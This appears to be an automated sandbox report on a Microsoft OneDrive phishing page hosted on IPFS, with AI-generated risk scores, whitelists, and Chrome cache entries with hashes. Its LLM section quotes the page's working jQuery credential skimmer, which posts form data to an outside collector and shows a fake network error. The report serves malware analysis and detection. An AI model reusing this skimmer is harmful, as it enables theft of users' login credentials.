Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.238, 66.102.1.84, 34.104.35.123, 142.250.185.138, 104.18.187.31, 104.18.186.31, 151.101.2.132, 151.101.66.132, 151.101.130.132, 151.101.194.132, 216.58.212.138, 172.217.16.202, 142.250.181.234, 142.250.186.138, 142.250.186.74, 216.58.212.170, 142.250.74.202, 216.58.206.74, 142.250.186.106, 172.217.23.106, 142.250.184.202, 142.250.186.42, 172.217.18.10, 142.250.186.170, 172.217.16.138, 142.250.185.74, 20.12.23.50, 199.232.214.172, 192.229.221.95, 13.85.23.206, 13.95.31.18, 20.242.39.171, 142.250.186.67, 142.250.185.206
Excluded domains from analysis (whitelisted): clients1.google.com, cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, j.sni.global.fastly.net, content-autofill.googleapis.com, ajax.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ Model: gpt-4o	```json { "riskscore": 2, "reasons": "The provided JavaScript code does not exhibit any clear signs of malicious behavior. It manipulates the DOM based on the URL fragment and handles a click event to toggle visibility of elements. However, the use of URL fragments and DOM manipulation could potentially be exploited in certain contexts, but there is no direct evidence of malicious intent in this snippet." }
$(document).ready(function() { var baseUrl = (window.location).href; var tech = baseUrl.substring(baseUrl.lastIndexOf('#') + 1); var is = $("#x1 ").html(tech); $('.wrap').click(function() { $('#show').hide(); $('#hide').show(); }); });
URL: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ Model: gpt-4o	```json { "riskscore": 8, "reasons": "The JavaScript code captures form data and sends it to an external URL (https://notmark.name.ng/dell/zob.php) via an AJAX POST request. This behavior is typical of phishing attacks where user credentials or other sensitive information are harvested. Additionally, the URL used does not appear to be associated with a legitimate or well-known service, increasing the likelihood of malicious intent." }
$(document).ready(function() { $("#hide").hide(); var baseUrl = (window.location).href; var url = baseUrl.substring(baseUrl.lastIndexOf('#') + 1); $("#x1").val(url); $("#formx").submit(function(e) { e.preventDefault(); var nm = $("#A1").val(); var formData = new FormData($("#formx")[0]); $("#submitBtn").html(`<button class="btn btn-sm btn-primary" disabled> <span class="spinner-grow spinner-grow-sm"></span> Please Wait... </button>`).prop("disabled", true); $.ajax({ url: "https://notmark.name.ng/dell/zob.php", type: 'POST', data: formData, contentType: false, processData: false, success: function(res) { console.log(res); $('#bd').show(); $('#hm').hide(); setTimeout(function() { $("#x1").val(url); $("#x2").val(""); $('#msg').html (`Network Error! Please verify your information and try again`); $("#submitBtn").html("Sign In").prop("disabled", false); }, 2000); } }); }); });
URL: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ Model: gpt-4o	```json { "phishing_score": 8, "brands": "Microsoft OneDrive", "phishing": true, "suspicious_domain": true, "has_loginform": false, "has_captcha": false, "setechniques": true, "reasons": "The URL 'https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/' does not match the legitimate domain name for Microsoft OneDrive, which should be something like 'onedrive.live.com'. The use of IPFS (InterPlanetary File System) for hosting a OneDrive page is highly unusual and suspicious. The page mimics the appearance of a legitimate OneDrive page, which is a common social engineering technique used in phishing attacks." }

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 48

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	32
Entropy (8bit):	4.101409765557392
Encrypted:	false
SSDEEP:	3:/lyMr0s2dl:/lyI0Nl
MD5:	92EADEE97762569915F013BCF763B7CE
SHA1:	00FD8372BB378DF48D7F565D7D601063A96053AA
SHA-256:	48E22AA9033C1E0BD6778E0AAAF217417E2A60AB4BF5889525458921638815D9
SHA-512:	A13499A37BCADAF62A1D9C98DD7F1D7819F4DBCBCD2B2BCB623143221B62B9EC1D940EB7C5C08880809B3FCFCEC389D03F86289495AF9734024986483A61FE5C
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlM1y0OCbiNHhIFDcJAk_ISBQ3_fd33?alt=proto
Preview:	ChYKBw3CQJPyGgAKCw3/fd33GgQISxgC

Chrome Cache Entry: 49

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65306)
Category:	downloaded
Size (bytes):	163873
Entropy (8bit):	5.058104233525069
Encrypted:	false
SSDEEP:	1536:4t04T8if0W8DsEBpy0cuJBf2rIWE5e0VUpz600I4fM:4t04/0VUpz600I4fM
MD5:	94994C66FEC8C3468B269DC0CC242151
SHA1:	EC16BD19BF4AE9BC2E2336AC409A503BBBDAACAD
SHA-256:	62F74B1CF824A89F03554C638E719594C309B4D8A627A758928C0516FA7890AB
SHA-512:	190194D1F30C8B6DFCB80F9AFDB75625FA5418A52405D81F15D8019BBD92510E817B25A3A18FEDA27D2D1231FE3921FD88FE037E1FBB1CCD08F5FE5E4742FFE3
Malicious:	false
Reputation:	low
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css
Preview:	@charset "UTF-8";/!. Bootstrap v5.1.3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,53

Chrome Cache Entry: 50

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 165 x 41, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	4048
Entropy (8bit):	7.935462450112636
Encrypted:	false
SSDEEP:	96:1A96Sh+E8SlBHpgFDUWrablMBNB93k6lzFetKdSu:Y6w8Sltpga5EpesSu
MD5:	724468C1614507300A601E930EE3828D
SHA1:	4987C77512BE1D8EAAAEF59BCFB17F8A505C1D91
SHA-256:	25789914C4415F6EA3F4C2054969B1CD2EAEA02F051C44DD9C0CF02D637DBDFD
SHA-512:	21BB142B2FEF95EE88B9CD3EF4A515985AB3A2AAFBC58D9AFD948F7175E99D4EF89AD60036D068D9B10479C619E97E3FA808D7807C309FCA80CA0BB239DD0BB3
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/3.png
Preview:	.PNG........IHDR.......)......;~.....sRGB.........gAMA......a.....pHYs..........o.d...eIDATx^..WTW.......ou.C.k......5....!- .`A.Lb.F.v.$j4....h...mwl[ 1..Q.'P.B.....;..UEQ..8$-....Z...}.\|..g..u....iR........@q,%p$.........'4...,.4...KX..y.{!..G...8.......K...8.w...8...x......K.X...Qn.....X....{[C....1.x#l/o.8d...;O...........^.u.G....{9.5..0........}..9.8.X.X7....+.{.....v....k.....l.....);G!r.........Wl.8l....>.!=^..F...,..#P..p..0...\.j;\|...'..n[.Sg.V6.."....K......8...p.4.,.4...6).!9.3..1....U0oZ.B....Jt.:O]<......^....bYvR.rb.2.X.P..[.N2.&.U.K...u..p..d/C.....nS.6p.<.`.&..p..."p~..P<....v......f..)....j'....uRc...5i...r.\.L.h%..D.:....N.....N7..].li.u.K5..*._]^...\|.2KN.^.....1.....q...;..ab.....D.eR.[t.3..MJ.U-5.eeJ.A!7...R.Hc..-..rw...W..b..+?.......[W.i(XS..L.@......C........Z..-.Q.B.zb..}:..TdFWd....F.....X..f]\|.bB.2.4eJ.K-`...[....;....o...........hr.g.<f..{\|....bp.].{..%Z..2.:..6k.....(...)-...5qF...#.Y.`..pb..SG16\.....'<

Chrome Cache Entry: 51

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 50 x 21, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	402
Entropy (8bit):	7.105361929858147
Encrypted:	false
SSDEEP:	6:6v/lhP2mUR/C+9Sp/b9EY/iiudD2SGVdTZgPQkYEfJcyt2DvG+D1HIrvVQQO3vos:6v/7+mU/4p/65R29VRghfEwQLg4N
MD5:	350BD2F9BE2C4606335D4524262E9CFF
SHA1:	8349346DEB8E3B704041425404FE658313C147EE
SHA-256:	148F106FC77F420A9002CDF65BD26CE8812EF97BCAF994DB31FDEB212013CDB5
SHA-512:	51929699CF8B1C1C1612A3E6E3981C8F9D6AA6CB22D4D5524382A8270E0E711F603E03BBE568AC95C478E28AC5E5D108F87B141CE178A0F57B165E67B1AC41ED
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...2...........h....sRGB.........gAMA......a.....pHYs..........o.d...'IDATHK.Q.. ..w.=.....p.C.M..(..Q\.E.....\|..1.?......Jtc.(.2}.M..jn....=.....7.q.k.....].g.....K=..:...f\..a...To.l.....<..c .j...0.GX.....O.,........T........~....&.r...+J......\|....",...'.......3.C.a."R."y,...b.;x..['X...j...%....A.=....W.T..."...p.}..X...$.88..X..U...D..Z..e.-.........IEND.B`.

Chrome Cache Entry: 52

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89795
Entropy (8bit):	5.290870198529059
Encrypted:	false
SSDEEP:	1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
MD5:	641DD14370106E992D352166F5A07E99
SHA1:	EDA46747C71D38A880BEE44F9A439C3858BB8F99
SHA-256:	A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
SHA-512:	A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
Preview:	/! jQuery v3.6.4 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 53

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 55 x 18, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	442
Entropy (8bit):	7.265342530096383
Encrypted:	false
SSDEEP:	12:6v/7ur/1NMxD3Y/JzpwBZEM3I4r5tOiYRUnv:iDiJ6pX7YRUnv
MD5:	84306B843A63D1D7CAABF8020FA9EDD2
SHA1:	43E7F881958ED1E483651906C7707410F44ABE39
SHA-256:	0BE6112A7B37C6218662D17EFC0A2E6EEC913BE12A94B31AD9C5157553A9E397
SHA-512:	3CFB4342DF0F1779D83A32CCF8C20137BE44DA748A7222B82EE5DEB482012F49FEE1BF42556CC2D58D909BAA2ADB934B6D859E3A45209AA6F9531A2E36E1FC1D
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...7.........p......sRGB.........gAMA......a.....pHYs..........o.d...OIDATHK.Q..0..w.=..]...R..D.L.b..%i....\|..O.4......?....t2J7<..?.z......._..M...G...U..]..W%.(.^..B...v.z......f...p\|YC.PRn...g....t...E..+ipj...#..S..36m....%K.....h.../QZ.D9...#....\..G...Y.Pb_.I.".=.Q.......(.`.:.....J/). 9..n%EJ.e..R...(.x...GI>.0..#(q.g`Q....$_.[.y...v...().......0....x...IJ.LGd..+.....(...(.....K....'....IEND.B`.

Chrome Cache Entry: 54

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 193 x 41, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	1900
Entropy (8bit):	7.820342038040371
Encrypted:	false
SSDEEP:	48:/ijunt72+azsOpQ5oGq3eax+1RXf8sjer3yBf/zIBSRygfKa/:cut729bJnxxsm3yB/zsSAw
MD5:	3AC5A352BD63387BC7CD05FC0D402D60
SHA1:	FEBF1D321D05455E2E5FE6D4A4C3FFE1B22CF4F2
SHA-256:	AC43A240D01B1C830270768B5C7D8E7F1B41B6980808535F50AEE95EEBDEF736
SHA-512:	0BE68A92EB2EB7F94D2D29DF2850D513F8CB22ADB31707291D237355D0A75FF126B4BF309CCE1DF6C0D7385369D3409B7C19E7488150FF85B67ABF9E01899CF0
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/4.png
Preview:	.PNG........IHDR.......)......7.$....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.{l.E....A%$..Wc)Z.F,....VD.15(..........+.Z....D.p.EP..Ei1........+m..Rh...O.....\..+x..eB..v.....iW8.kp.8V..q..t.=g.li3.g.6..~..:...'.o.>..{#.w.lo....<O....sn.'...,...nQ.......FGG/_../...I\|...R..v.4.]3.;O.M..X}..d....}.[..n.SJmrs....W...w.t..7.N....s..\..h.0..'6.N....JGj..{.[Z:..N....:... .V...ue..J.....iDV#.......tP.F..........4w<.@,....?....>.k.....9....../b..CID...9.\|[..m.sn.....e]+r......;w......r.\.J...P8...H..."......J...{nQj.z7.q....1.P......{...m....>.n....m.Mk...P{...Q..K....9q.N..t...L..2...:_\.\8..../w.x.c.<g.....ve/.Y..s.CF{..O.'..>.(@...9Kp.N..tH9.;nu....5~.._i.UU.A...ce%<._...IE.aq..CI..!...`.322.E..xN.v.,.7*..$...5Z....C...kd8da?.+[.....r..Nz..ep..[.KK_n........u...F2.Xe0...!E.......yk.".Q4"...{....0....x..4....r(R.h..p8x.'e`...\..:...2&4.d...0...X...pH.../B...YJ.?U..I....\~....\ns...~.Z.`..VB.'B8..F.:..<...J:..,..V......

Chrome Cache Entry: 55

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 357 x 45, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	2620
Entropy (8bit):	7.8770588801603125
Encrypted:	false
SSDEEP:	48:zrDrBy2SKQ+XhW4am8KL7sJPk3PRGUsJG+bRV8JQNAnq8dYcjrnigpe37k:zrvBlSKdt7nHstk3mJn8AyD
MD5:	D9CB6B3C14A91E274480DDBD3B9D81CE
SHA1:	1677DFAE988D050E2F973C4B4B58525024E9ED4B
SHA-256:	8974110D1EA1B91179D80B89C7E8CE8EA46EF6941890F5D21CCDD33401591949
SHA-512:	337357D2AA509330E3EE4D8C7F310A06AB8C9E42FEAEC4C8B149A4008F730668E44143A6E47081070611652258069BD48AD3A62DF7CD6F40FB182EEE8E6F748B
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/1.png
Preview:	.PNG........IHDR...e...-........Y....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..l.G.../..U%.D... E.....H.%.!...-Ph.hS..X.&E!@%D$$..:.i.M......S..N\.%JT....}w...u~)r..gx.;3.fw....}.....o.{.......A.D4H/......A.Q!. ."...AD.. ...^.....^$.-a.~I..&......6.}..k.....w6..~kj...[&......e.f.0>v.....G............gff...!.....Eb."6>.(q..g_.O.9/....u..'..t..m[..m......X.4Q.v.d....Cg=...^.x..U.....A.5E..x.Lf...s..SO].......3.C...?....njJ.x_..m&..<..O.\|.. j.9.b1<_\....q...'.?....}..yr.....{v......../&.].jAzA...\z...N.J....e....x.........+<.;.s.H...oM,}K@/..\|N.X,.G...A.5.A/........=<.uS..cw}.9....Lu.ux...;.....G............g....m.~..+.q..A.5.^/F?....;W....{m\|.m.......6.....;F.^7.v..O.W..._............\/..2.A..z.p...G.....h&..t....]0.1........G.....c.H H/.........333W.\.7}.x.q.<.9+.....+..#.'...~yc[...i[.<7<.C4Y-2....L..`.8%....``.[{..9..n.m...R.+.......C)[/@..NL..).y`v....../.X....-w........>..`h...Yq..zQB.ox...nVtP.%.\|.z

Chrome Cache Entry: 56

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 77 x 28, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	479
Entropy (8bit):	7.2671040975854355
Encrypted:	false
SSDEEP:	12:6v/7W8/4E1LfIrYwTzmnrlqSNHlRJ8VbmN+9sQkE0Bl/SNc29a:8LArYezCRnbQSBlKX9a
MD5:	8F154DA726C6BA8BC249AF82FEC33250
SHA1:	B3E80E8B338BB07D767E7CA3AEDAE814864F5228
SHA-256:	119191F22EA22FF461D6F4F4A13A451072AA736D31DB3B11F99379305E014D1B
SHA-512:	93CB20F29585046350310DAC648EE1E158C6178AF49F9FE34951EC2241ACB61CB758A6E997CD6EAE978E1BE4D6CC5E8AA3D47E00248B3FDA404A84A26F266C00
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...M.................sRGB.........gAMA......a.....pHYs..........o.d...tIDATXG..0..Y..........'S..t..s.;.....IU.'.B...%f.....K../..48...$..4.d.-.i......\.....p^.x..7F....V........gqBhhy...#..\|.o...iZ..)H..$...\|.e.A.....)'....nB.PBR...(,..e)..-.8....."....='.$.4..6...&<..N.MZ.:...;.g.......T.5$.....=.....RZF4N.!.!'...j.l.."..Cm....9...z9.....N.t.. ...^.7......g....5.Y~...]...P&...0..s[.m..*.2FX.s..../.F...I../..48..wp....:?;.aG....IEND.B`.

Chrome Cache Entry: 57

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15086
Entropy (8bit):	4.020155068262484
Encrypted:	false
SSDEEP:	384:jOm6B8m3TKwau0Y4a+oRvqBphSypP+H8It7:bi14aJRvgLSyA8It7
MD5:	EA7D143EFE3C01DE298F9F1130E8BCE5
SHA1:	4672164FAB3870DD901034ABCF3D35998AC94DBE
SHA-256:	94A9FEFBBE42310C03FF1E52C1F753C21038805F632867EA78930A52C445A456
SHA-512:	B9B76EE9964E836EA720828E77952E89ECC318D55EF5107F89C11F666C1BC0742D1BDBAD0BC1CAD853D93D1E150664056705BA3688544220759E9F4977800A8D
Malicious:	false
Reputation:	low
URL:	https://ipfs.tech/favicon.ico
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................;...@!..I...............................................................................................................................................................................8...;R..=..B..Cv..D...............................

Chrome Cache Entry: 58

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 47 x 21, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	356
Entropy (8bit):	6.997860926689127
Encrypted:	false
SSDEEP:	6:6v/lhPw+pVR/C+6AgSp/lduEFoiGTCgVaqMk9H0blvHeOVTj3eWudV181qp:6v/7Y+F/WUp/lduAo9Mk9H0Jffjet
MD5:	37F919B2847B617763E8E404A0D3A4EE
SHA1:	4647AF89D27B824BDA8B58F255F9CD6BBC6F0A6E
SHA-256:	9EEB371FBFF81AF820DEB5DB9A1C8C9E5AC9700FB594ED07C717AFB7AB992315
SHA-512:	4202ED7729236045DBFC7D448C418B6A8C9B238F0BB07F5C531D25CDF946E3A7E238B72B25ACA26F62701BC0144FF38C8330A0CC79C8B211EAE82AEACFFC4889
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/b.png
Preview:	.PNG........IHDR.../.........Y. 0....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.Q.. ..w.=..]LL8.!.&.x..(r.WJg.Q...\|..!.?.G..v'..Y.F.il.t.}'uf.L.T..UU=X?@..".@3w....>.u.:.p.l.Y3.~.4v...-.BHvi.....(.[..4....Y2....W.=.\a..}...,.....B..qlq!3....<o2.6.-r..4t;!.H..g.A....._...D#.4X....4h.hp/;.4...h..?...4..............IEND.B`.

Chrome Cache Entry: 59

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 50 x 21, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	402
Entropy (8bit):	7.105361929858147
Encrypted:	false
SSDEEP:	6:6v/lhP2mUR/C+9Sp/b9EY/iiudD2SGVdTZgPQkYEfJcyt2DvG+D1HIrvVQQO3vos:6v/7+mU/4p/65R29VRghfEwQLg4N
MD5:	350BD2F9BE2C4606335D4524262E9CFF
SHA1:	8349346DEB8E3B704041425404FE658313C147EE
SHA-256:	148F106FC77F420A9002CDF65BD26CE8812EF97BCAF994DB31FDEB212013CDB5
SHA-512:	51929699CF8B1C1C1612A3E6E3981C8F9D6AA6CB22D4D5524382A8270E0E711F603E03BBE568AC95C478E28AC5E5D108F87B141CE178A0F57B165E67B1AC41ED
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/a.png
Preview:	.PNG........IHDR...2...........h....sRGB.........gAMA......a.....pHYs..........o.d...'IDATHK.Q.. ..w.=.....p.C.M..(..Q\.E.....\|..1.?......Jtc.(.2}.M..jn....=.....7.q.k.....].g.....K=..:...f\..a...To.l.....<..c .j...0.GX.....O.,........T........~....&.r...+J......\|....",...'.......3.C.a."R."y,...b.;x..['X...j...%....A.=....W.T..."...p.}..X...$.88..X..U...D..Z..e.-.........IEND.B`.

Chrome Cache Entry: 60

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 193 x 41, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1900
Entropy (8bit):	7.820342038040371
Encrypted:	false
SSDEEP:	48:/ijunt72+azsOpQ5oGq3eax+1RXf8sjer3yBf/zIBSRygfKa/:cut729bJnxxsm3yB/zsSAw
MD5:	3AC5A352BD63387BC7CD05FC0D402D60
SHA1:	FEBF1D321D05455E2E5FE6D4A4C3FFE1B22CF4F2
SHA-256:	AC43A240D01B1C830270768B5C7D8E7F1B41B6980808535F50AEE95EEBDEF736
SHA-512:	0BE68A92EB2EB7F94D2D29DF2850D513F8CB22ADB31707291D237355D0A75FF126B4BF309CCE1DF6C0D7385369D3409B7C19E7488150FF85B67ABF9E01899CF0
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......)......7.$....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.{l.E....A%$..Wc)Z.F,....VD.15(..........+.Z....D.p.EP..Ei1........+m..Rh...O.....\..+x..eB..v.....iW8.kp.8V..q..t.=g.li3.g.6..~..:...'.o.>..{#.w.lo....<O....sn.'...,...nQ.......FGG/_../...I\|...R..v.4.]3.;O.M..X}..d....}.[..n.SJmrs....W...w.t..7.N....s..\..h.0..'6.N....JGj..{.[Z:..N....:... .V...ue..J.....iDV#.......tP.F..........4w<.@,....?....>.k.....9....../b..CID...9.\|[..m.sn.....e]+r......;w......r.\.J...P8...H..."......J...{nQj.z7.q....1.P......{...m....>.n....m.Mk...P{...Q..K....9q.N..t...L..2...:_\.\8..../w.x.c.<g.....ve/.Y..s.CF{..O.'..>.(@...9Kp.N..tH9.;nu....5~.._i.UU.A...ce%<._...IE.aq..CI..!...`.322.E..xN.v.,.7*..$...5Z....C...kd8da?.+[.....r..Nz..ep..[.KK_n........u...F2.Xe0...!E.......yk.".Q4"...{....0....x..4....r(R.h..p8x.'e`...\..:...2&4.d...0...X...pH.../B...YJ.?U..I....\~....\ns...~.Z.`..VB.'B8..F.:..<...J:..,..V......

Chrome Cache Entry: 61

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (36285), with CRLF line terminators
Category:	downloaded
Size (bytes):	53823
Entropy (8bit):	6.164747274145746
Encrypted:	false
SSDEEP:	768:t7us2sDfUmMBXsx8HxyixlQxgrxZ/dJJlHTA1pB666oLe5SDON/igEFOZNtKt54F:ksprJo/dfhUaSDOV1A8NtKweAoZlK
MD5:	8E7AC3CDCC7CEBB616D58A432829ECB9
SHA1:	25CB9ED4D4B5880517052E7A308C98D25701F623
SHA-256:	EAF01F7C70028AD9A82D17F91B2293FFDE852C8B4DFA01A9511A33F5166A339D
SHA-512:	A463AE93B93A6615920F245A9625697FA3A4623C2BEF00CC44FB1277E6B37DDF5A0DA1F826ED59919AF90EDEED1CF5D0CF4773295AA4AA602AE9C8B55D26AC01
Malicious:	false
Reputation:	low
URL:	https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/
Preview:	..<!DOCTYPE html>..<html lang="en">....<head>.. <title></title>.... <meta name="description" content="">.... <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>...... <meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>..<style>.....wrap {.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. padding: 20x;.. opacity: 0.8;.. height: 450px;.. display: flex;.. align-items: center;..}.....wrap img {.. width: 100%;..}.....wrapa {.. position: absolute;.. top: 40%;.. left: 40%;.. transform: translate(-50%, -50%);.. padding: 20x;.. height: 450px;.. display: flex;.. align-items: center;.. width: 60%;..}....

Chrome Cache Entry: 62

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 45 x 20, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	405
Entropy (8bit):	7.082107120163585
Encrypted:	false
SSDEEP:	12:6v/7q0/vFC1n5vNCa9j+Z7zTMtCxjw0E3gRq7:d6CV5vka9S9TuIHESq7
MD5:	75CA17434579A6A886ED6021F143E16C
SHA1:	D734D9F81A1761F4E2BF8A1B6E1301BED934F8AD
SHA-256:	D509A86793135D9691726E796B0263F49DF5187D7061755CB237E1EBB0B443A3
SHA-512:	90E2F3AECA3DD663D619E0406F002F9D952CD0E05B14F0F6CE92C3125680D169BF65414B273A0852F0DA4A1D82ACA60CF219CE72B8F59609B3F886F504BA3B24
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...-...........#.....sRGB.........gAMA......a.....pHYs..........o.d...IDATHK.M.. ....p.]LL8.1.&.x..(r....-S3$..Y.B.?.\|<....U...!.9..k.g....../G..Z.XU..i......v.G.m...p.S..M.s...$....)..s..k...\..3`5.0X....a\|s.r.;...//8..8.."..rl.\|v.3 .._....\|....U.'y.q.dd.Ay.1.J8\|....{.t.Y..n....'.p`....\|R..o..n9XL........i...;...A...x]..qP....<U...Qb}). .=e...T...R...<_.gd,F0q....IEND.B`.

Chrome Cache Entry: 63

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 110 x 36, 8-bit/color RGB, non-interlaced
